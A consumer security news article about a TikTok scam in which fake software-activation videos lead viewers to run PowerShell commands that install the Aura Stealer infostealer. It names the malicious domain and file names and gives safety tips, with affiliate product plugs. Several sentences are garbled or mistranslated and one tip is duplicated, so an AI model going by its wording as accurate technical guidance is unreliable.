TikTok malware scam uses fake software activation guides to steal data

Cybercriminals are once again turning TikTok into a trap for unsuspecting users. This time, they’re in disguise Malicious downloads As free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.

Security expert Xavier Mertens first discovered the campaign, confirming that the same type of scheme was seen earlier this year. According to BleepingComputer, this… Fake TikTok videos Show short PowerShell commands and ask viewers to run them as administrators to “activate” or “fix” their software.

In reality, these commands connect to a malicious website and extract malware known as Aura Stealer, which quietly siphons saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.

Sign up for my free CyberGuy report
Get the best tech tips, breaking security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – for free when you join my site CYBERGUY.COM Newsletter.

More than 3,000 YouTube videos provide malware disguised as free software

Cybercriminals are using fake TikTok videos to trick users into downloading malware disguised as free activation guides. (Kurt “CyberGuy” Knutson)

How does the TikTok scam work

This campaign uses what experts call a ClickFix attack. It is a social engineering trick that makes victims feel like they are following legitimate technical instructions. The instructions seem quick and simple: run one short command and get instant access to premium software.

But instead of activating anything, the PowerShell command connects to a remote domain called slmgr[.]win, which downloads malicious executables from pages hosted on Cloudflare. The main file, updater.exe, is a variant of the Aura Stealer malware. Once it enters the system, it looks up your credentials and sends them back to the attacker.

Another file, source.exe, uses the Microsoft C# compiler to run code directly in memory, making it more difficult to detect. The purpose of this additional payload is not yet fully known, but the pattern follows previous malware used to steal cryptocurrencies and deliver ransomware.

META ACCOUNT SUSPENSION SCAM HIDES FILEFIX MALWARE

These short “activate” commands secretly connect to malicious servers that install information-stealing malware such as Aura Stealer. (Kurt “CyberGuy” Knutson)

How to stay safe from malware scams on TikTok

Although these scams look convincing, you can avoid falling victim to them by taking the right precautions.

1) Avoid abbreviations

Never copy or run PowerShell commands from TikTok videos or random websites. If something promises you free access to premium software, it’s probably a trap.

2) Use reliable sources

Always download or activate the software directly from the official website or through legitimate app stores.

3) Keep your security tools up to date

Antivirus software or outdated browsers cannot detect the latest threats. Update your software regularly to stay protected.

4) Use powerful antivirus software

Install powerful antivirus software that provides instant scanning and protection against Trojans, information theft, and phishing attempts.

The best way to protect yourself from malicious links that install malware, and potentially access your private information, is to have strong links. Antivirus software Installed on all your devices. This protection can also alert you to phishing emails and ransomware, keeping your personal information and digital assets safe.

Get my picks for the best antivirus protection winners of 2025 for Windows, Mac, Android, and iOS at Cyberguy.com

5) Register for the data removal service

If your personal data ends up on the dark web, a data removal or monitoring service can alert you and help remove sensitive information.

While no service can guarantee complete removal of your data from the Internet, a data removal service is truly a smart choice. It’s not cheap, and neither is your privacy. These services do all the work for you by systematically monitoring and scraping your personal information from hundreds of websites. This gives me peace of mind and has proven to be the most effective way to clear your personal data from the Internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data from breaches to information they might find on the dark web, making it harder for them to target you.

Check out my top picks for data removal services and get a free check to see if your personal information really exists on the web by visiting Cyberguy.com

Get a free check to see if your personal information is already on the web: Cyberguy.com

6) Reset credentials

If you’ve ever followed suspicious instructions or entered credentials after watching a “Free Activation” video, reset all your passwords immediately.

7) Reset passwords

If you’ve ever followed suspicious instructions or entered credentials after watching a “Free Activation” video, reset all your passwords immediately. Start with your email, financial accounts, and social media. Use unique passwords for each site. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse.

Next, check if your email has been exposed in previous breaches. Our #1 password manager (see Cyberguy.com) Choice includes a built-in penetration scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com

8) Enable multi-factor authentication

Add an extra layer of security by turning on Multi-factor authentication Wherever possible. Even if your passwords are stolen, attackers won’t be able to log in without verifying you.

If you follow suspicious steps, change your passwords, enable two-factor authentication, and be alert for future scams. (Getty Images)

Key takeaways for Kurt

TikTok’s global reach makes it a prime target for scams like this. What seems like a useful hack could end up costing your security, money, and peace of mind. Be vigilant, trust only verified sources, and remember that there is no such thing as a free activation shortcut.

Click here to download the FOX NEWS app

Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at Cyberguy.com

Sign up for my free CyberGuy report
Get the best tech tips, breaking security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – for free when you join my site CYBERGUY.COM Newsletter.

Copyright 2025 CyberGuy.com. All rights reserved.